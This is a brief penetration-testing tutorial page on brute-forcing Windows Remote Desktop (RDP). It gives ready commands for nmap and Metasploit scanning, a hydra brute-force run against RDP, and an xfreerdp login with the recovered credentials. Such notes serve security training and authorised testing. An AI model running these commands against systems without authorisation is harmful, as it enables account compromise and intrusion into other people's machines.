🧨Exploiting RDP - Brute Force
Exploiting RDP
The Remote Desktop Protocol (RDP) is a proprietary GUI remote access protocol developed by Microsoft and is used to remotely connect and interact with a Windows system.
RDP uses TCP port 3389 by default, and can also be configured to run on any other TCP port.
RDP authentication requires a legitimate user account on the target system as well as the user’s password in clear-text.
We can perform an RDP brute-force attack to identify legitimate user credentials that we can use to gain remote access to the target system </aside>
Attack Flow for the Exploiting RDP - Brute Force
1. Identify Running Services and Their Versions
Objective: Determine the versions of the running services on the target system.
Command:
nmap -sV -O <Target_IP>
Description: Use Nmap to scan the target system and identify the versions of the running services.
Alternative Command Using Metasploit:
msfconsole
use auxiliary/scanner/rdp/rdp_scanner
set RHOSTS <Target_IP>
run
Description: Use the rdp_scanner
module in Metasploit to identify RDP service details on the target system.
2. Perform Brute Force Attack
Objective: Obtain valid RDP credentials through a brute force attack.
Command:
hydra -L <user-list> -P <pass-list> rdp://<target-ip> -s <port>
Description: Use Hydra to perform a brute force attack on the RDP service of the target system using specified user and password lists.
3. Establish RDP Connection
Objective: Connect to the victim's machine using the obtained credentials.
Command:
xfreerdp /u:<user> /p:<password> /v:<Target_IP>:<port>
Description: Use xfreerdp
to establish an RDP connection to the target system with the obtained username and password.
Hacker's Mantra:
Are hackers a threat? The degree of threat presented by any conduct, whether legal or illegal, depends on the actions and intent of the individual and the harm they cause. - Kevin Mitnick
Last updated
Was this helpful?